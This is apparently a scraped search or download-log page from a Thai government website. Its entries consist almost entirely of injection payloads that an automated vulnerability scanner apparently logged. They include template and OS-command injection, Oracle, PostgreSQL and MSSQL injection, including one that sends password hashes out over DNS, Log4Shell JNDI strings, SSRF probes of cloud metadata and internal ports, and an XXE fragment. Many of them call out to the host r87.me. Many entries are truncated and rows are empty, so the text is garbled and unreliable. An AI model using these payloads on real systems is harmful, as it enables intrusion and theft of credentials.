ดาวน์โหลดข้อมูล
find_in_page    123123 (18 มีนาคม 2566)
find_in_page    123123 (18 มีนาคม 2566)
find_in_page    123123 (18 มีนาคม 2566)
find_in_page    123123 (18 มีนาคม 2566)
find_in_page    123123 (18 มีนาคม 2566)
find_in_page    111 (18 มีนาคม 2566)
find_in_page    (13 กันยายน 2565)
find_in_page    __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgZGF4a2JjemowYWgwcnlsZ2xhdXJicjV6OGN4bTZmaTdpcnJsajF2MmlzYS5yODcubWU=')).read() (13 กันยายน 2565)
find_in_page    require 'resolv';Resolv.getaddress ("daxkbczj0anwwuiwnbe8dwxiw8bnfv8ey5j17qay".concat "sz4.r87.me") (13 กันยายน 2565)
find_in_page    <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup daxkbczj0aia4ue-bc-bjmyemm4_ajp4cpzcdmhm"+"que.r87.me") } (13 กันยายน 2565)
find_in_page    <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<(13 กันยายน 2565)
find_in_page    <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgZGF4a2JjemowYWY1cXdpcGJseDBrOXpmcnp4OXVvOC1lc3IzeW1zdmh3ZS5yODcubWU=')})).to_s}" %> (13 กันยายน 2565)
find_in_page    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup daxkbczj0aqhyq2zk2bkt9ws4psxm-0vinu3g1lh"~"1n0.r87.me")}} (13 กันยายน 2565)
find_in_page    {php}Smarty_Resource::parseResourceName(system("nslookup daxkbczj0azlfbqour77j4mlgyr1vzhjmhaqyevp"."iky.r87.me"),'b');{/php} (13 กันยายน 2565)
find_in_page    <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgZGF4a2JjemowYXdiam83am9fcGxvcDVvM2V2cGNvbWkxdDF6Yy1haXdxaS5yODcubWU=','base64').toString()) %> (13 กันยายน 2565)
find_in_page    = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgZGF4a2JjemowYThsbml5YWphYnNzeHJ5dW52azBfNnRreGp0YW9majRhYy5yODcubWU=','base64').toString()) (13 กันยายน 2565)
find_in_page    {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnWkdGNGEySmplbW93WVhOc1pHdGphSGcyWkdwa2VXZ3h (13 กันยายน 2565)
find_in_page    {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgZGF4a2JjemowYXhpYnp4MWliZmluLTd4aW5hejJvYWZodDdxazEtbHF1Yy5yODcubWU=')).read()}} (13 กันยายน 2565)
find_in_page    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.op (13 กันยายน 2565)
find_in_page    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.op (13 กันยายน 2565)
find_in_page    |nslookup${IFS}"daxkbczj0agdoh1f3qlsjd-q0mekes-tjjrxrs7m""o_c.r87.me" (13 กันยายน 2565)
find_in_page    "&nslookup "daxkbczj0aklz4nms3fwytggpjm2pkhzbybekv9u""9wg.r87.me" (13 กันยายน 2565)
find_in_page    '&nslookup "daxkbczj0a_jecirz3p_ua5m6zzu2iviuzwpd6y6""5im.r87.me" (13 กันยายน 2565)
find_in_page    &nslookup "daxkbczj0aprxqxzupsx6ljriayb_7a-ysq9ihml""eeo.r87.me" (13 กันยายน 2565)
find_in_page    nslookup "daxkbczj0a_dlol28lbkqhz0k1x66boggytie87x""5me.r87.me" (13 กันยายน 2565)
find_in_page    "& nslookup daxkbczj0aiw9uqmibixls7usfe-l1cekrg2zxbn^hhs.r87.me&'\"`0&nslookup daxkbczj0aiw9uqmibixls7usfe-l1cekrg2zxbn^hhs.r87.me&`' (13 กันยายน 2565)
find_in_page    '& nslookup daxkbczj0amfn8susovjubpuqugfx-ou974qgece^goa.r87.me&'\"`0&nslookup daxkbczj0amfn8susovjubpuqugfx-ou974qgece^goa.r87.me&`' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    & nslookup daxkbczj0axrgeecgqavajx_rkxoo-sxczurttdv^kl8.r87.me&'\"`0&nslookup daxkbczj0axrgeecgqavajx_rkxoo-sxczurttdv^kl8.r87.me&`' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    nslookup daxkbczj0a_8etaglxhw2dqoycbwmifednq1lc0m^9g8.r87.me&'\"`0&nslookup daxkbczj0a_8etaglxhw2dqoycbwmifednq1lc0m^9g8.r87.me&`' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "+gethostbyname(lc 'daxkbczj0av3_p-2rfgax5nq23uz5bzgblqj9vmh'.'dxy.r87.me')+" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+gethostbyname(lc 'daxkbczj0atkmshh_luw3sfp3jidppyia4rrziag'.'p7g.r87.me')+' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    eval('gethostbyname(lc 'daxkbczj0ayb_kxhnmclebwhyvg4orlodui3l-e5'.'lhe.r87.me')') (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    gethostbyname(lc 'daxkbczj0aksritme-eohagtjrvcsbh11r9od50n'.'otg.r87.me') (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "+createobject("WScript.Shell").exec("nslookup daxkbczj0a0_1_8i4xzacimi9_fad-26etnzu3wp" & "yya.r87.me").StdOut.ReadAll+" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    <%createobject("WScript.Shell").exec("nslookup daxkbczj0axam4yf8f5okn43kzdwhkhqd2qvlcsw" & "qna.r87.me").StdOut.ReadAll%> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    +createobject("WScript.Shell").exec("nslookup daxkbczj0ahftiv7bvpuz71q37oqpezx4zlx8-ka" & "obk.r87.me").StdOut.ReadAll+ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    +createobject("WScript.Shell").exec("nslookup daxkbczj0aofqmotadbohjdfvj68204_jxeaqh6c" & "iqi.r87.me").StdOut.ReadAll (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    createobject("WScript.Shell").exec("nslookup daxkbczj0akyypguoqafn4clzxuiqtks7vqgovyy" & "lma.r87.me").StdOut.ReadAll (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '{${gethostbyname(trim('daxkbczj0ak6yvvp69pozqmbtp3egbkrttbpt8_u'.'el0.r87.me'))}}' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "+gethostbyname(trim('daxkbczj0axa4ppymdgzyrvhowucf6bzvveumeiv'.'0a8.r87.me'))+" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+gethostbyname(trim('daxkbczj0ajyy5xibar6e1hxf4mc__v8uh-5iw8z'.'klm.r87.me'))+' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    +gethostbyname(trim('daxkbczj0alqhghfmxthr2_-_ppznbtvmolrryrm'.'ysa.r87.me'));// (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    gethostbyname(trim('daxkbczj0akckrdeabjsp9cwcjbao4jfedthglfa'.'bmi.r87.me')); (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    gethostbyname(trim('daxkbczj0an6stgcmo4metqd3urzxpxi2yklzldh'.'4hg.r87.me')) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    https://metadata.packet.net/metadata (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://169.254.169.254/opc/v1/instance (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    https://www.cots.go.th/server-status (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://[::1]:3306 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://103.233.192.230:3306 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://127.0.0.1:3306 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://[::1]:22 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://103.233.192.230:22 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://127.0.0.1:22 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://169.254.169.254/latest/meta-data/public-hostname (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://aws.r87.me/latest/meta-data/public-hostname (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    [::1]/elmah (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    127.0.0.1/elmah (13 กันยายน 2565)
find_in_page    '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(100)||chr(97)||chr(120)||chr(107)||chr(98)||chr(99)||chr(122)||chr(106)||chr(48)||chr(97)||chr(100)||chr(109)||chr(115)||chr(112)||chr (13 กันยายน 2565)
find_in_page    127.100.11.2/elmah (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(100)||chr(97)||chr(120)||chr(107)||chr(98)||chr(99)||chr(122)||chr(106)||chr(48)||chr(97)||chr(121)||chr(55)||chr(117)||chr(108)| (13 กันยายน 2565)
find_in_page    103.233.192.230/elmah (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (select UTL_INADDR.GET_HOST_ADDRESS(chr(100)||chr(97)||chr(120)||chr(107)||chr(98)||chr(99)||chr(122)||chr(106)||chr(48)||chr(97)||chr(108)||chr(111)||chr(106)||chr(109)||chr(104)||chr(112)||chr(50)|| (13 กันยายน 2565)
find_in_page    www.cots.go.th/elmah (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    https://www.cots.go.th/elmah (13 กันยายน 2565)
find_in_page    '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('daxkbczj0a2fajeudlsikccjvnwc8boojqhz5r1h'||'-l4.r87.me') from DUAL))||' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('daxkbczj0ay85gcjh-ejdypsvbokpx-ktnx-vjd6'||'eli.r87.me') from DUAL)))) (13 กันยายน 2565)
find_in_page    [::1]/elmah.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (select UTL_INADDR.GET_HOST_ADDRESS('daxkbczj0aixtt2k8mejeakbnpfat4oz7gd2zj4n'||'bsq.r87.me') from DUAL) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    127.0.0.1/elmah.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '||(SELECT dblink_connect('host=daxkbczj0assgplq1athv3nf7p0my2cubyuhjrfy'||'zt4.r87.me user=a password=a connect_timeout=2'))||' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    127.100.11.2/elmah.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(100)||chr(97)||chr(120)||chr(107)||chr(98)||chr(99)||chr(122)||chr(106)||chr(48)||chr(97)||chr(120)||chr(112)||chr(103) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    103.233.192.230/elmah.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    cast((SELECT dblink_connect('host=daxkbczj0a5hxxcbn7ucgzk2x1ml-l89scsoe5gv'||'zbs.r87.me user=a password=a connect_timeout=2')) as numeric) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    www.cots.go.th/elmah.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    dblink_connect('host=daxkbczj0a3vw611iy49em_bzqjzrypzzseeb8e6'||'ycw.r87.me user=a password=a connect_timeout=2') (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    https://www.cots.go.th/elmah.axd (13 กันยายน 2565)
find_in_page    ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://daxkbczj0ahuw8${lower:h}c4_g8ae-vyeqgjaiab20bsh24lt8.r87.me} (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    SELECT dblink_connect('host=daxkbczj0ameecwgwk1w6xqrqcce6x7hypcysxi9'||'44i.r87.me user=a password=a connect_timeout=2') (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    [::1]/trace.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://daxkbczj0aan5al3dv${lower:2}qg7xu_gxbihgjdtladst29u4.r87.me} (13 กันยายน 2565)
find_in_page    -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','daxkbczj0aug39jqg7f_z8sf5bouysrogmtnwvsp'+'pkq.r87.me (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    127.0.0.1/trace.axd (13 กันยายน 2565)
find_in_page    ${jndi:dns://daxkbczj0atx3igiczozbboy9kc${lower:c}vj_xo-70eomrtiq.r87.me} (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','daxkbczj0ax0xoxyktplb77jzfjf1vhahqpvktwt'+'5n0.r87.me') (13 กันยายน 2565)
find_in_page    127.100.11.2/trace.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','daxkbczj0avy0ttdlwp2yvgfp7vw661dxktmidyp'+'aiy.r87.me')ex (13 กันยายน 2565)
find_in_page    103.233.192.230/trace.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    syscolumns WHERE 2>3;exec('xp_dirtree ''\\daxkbczj0a-ythj7-8rus8y_tes32o53ou1bsf8d'+'t6c.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    www.cots.go.th/trace.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1'))exec('xp_dirtree ''\\daxkbczj0aayl5tqzkjvn3yjadymjs9uu37amd2x'+'lou.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    https://www.cots.go.th/trace.axd (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1))exec('xp_dirtree ''\\daxkbczj0asahvgc6yhvmzocnqjc1j8wpz4o0pmy'+'7q4.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1')exec('xp_dirtree ''\\daxkbczj0ayz3uuaofxcjdgxpbw_xx48cbwwylut'+'v7w.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1) exec('xp_dirtree ''\\daxkbczj0ae2pmsv-zafw45wt6xeuhrwq_2smosz'+'m5m.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    -1';exec('xp_dirtree ''\\daxkbczj0at4fbcys5y8evuh0kgdpe1ubtbpfnlm'+'rzk.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    1;exec('xp_dirtree ''\\daxkbczj0a_qrdtw6wwuao50hxngi-6l5l-gvhdg'+'iaa.r87.me'+'\c$\a''')-- (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.daxkbczj0ashpfffuho1wmz1oy8tq1nyulsrmecu'+'r8u.r87.me' from sys.sql_logins WHERE (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    daxkbczj0asdh0vx8gxmbhumbtmqj3daqcqhggyrhqr.r87.me/p/ (13 กันยายน 2565)
find_in_page    exec('xp_dirtree ''\\daxkbczj0aq7qux5syqgn43toyfa2yn7btnqi4yz'+'wuy.r87.me'+'\c$\a''') (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    php://filter//resource=http://daxkbczj0ar_qu9xhya92mkg3arpdevzx-bhu1clbwv.r87.me/p/ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://daxkbczj0aokzyf6gfmftp0agn_yep-tzlclokcfrg3.r87.me/p/ (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    %dtd;]>&a;(13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    __import__('os').popen(('SET /A 268409241 - {0}').format('41433')).read() (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    __import__('os').popen(('expr 268409241 - {0}').format('89460')).read() (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    p "#{0xFFF9999.to_i-`echo 87382`.to_i}" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
()%26%25'>
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    +print(int)0xFFF9999-58370;// (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    print(int)0xFFF9999-70075; (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    print(int)0xFFF9999-53079 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    <% response.write(268409241-78535) %> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    "+response.write(268409241-45567)+" (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
'>
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    +response.write(268409241-86580)' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    response.write(268409241-32433)' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
ipt> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    r87.com/n (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    ns@mail.ns'"/>()%26%25 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    php://filter//resource=http://r87.com/n?.php (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    http://r87.com/n?.php (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    //r87.com/?0x01F077 (13 กันยายน 2565)
find_in_page    http://r87.com/n?.php (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    hTTp://r87.com/n (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    %22%2bnetsparker(0x01F06B)%2b%22 (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '"@--> (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    '+netsparker(0x01F053)+' (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    netsparker(0x01F04F) (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
find_in_page    (13 กันยายน 2565)
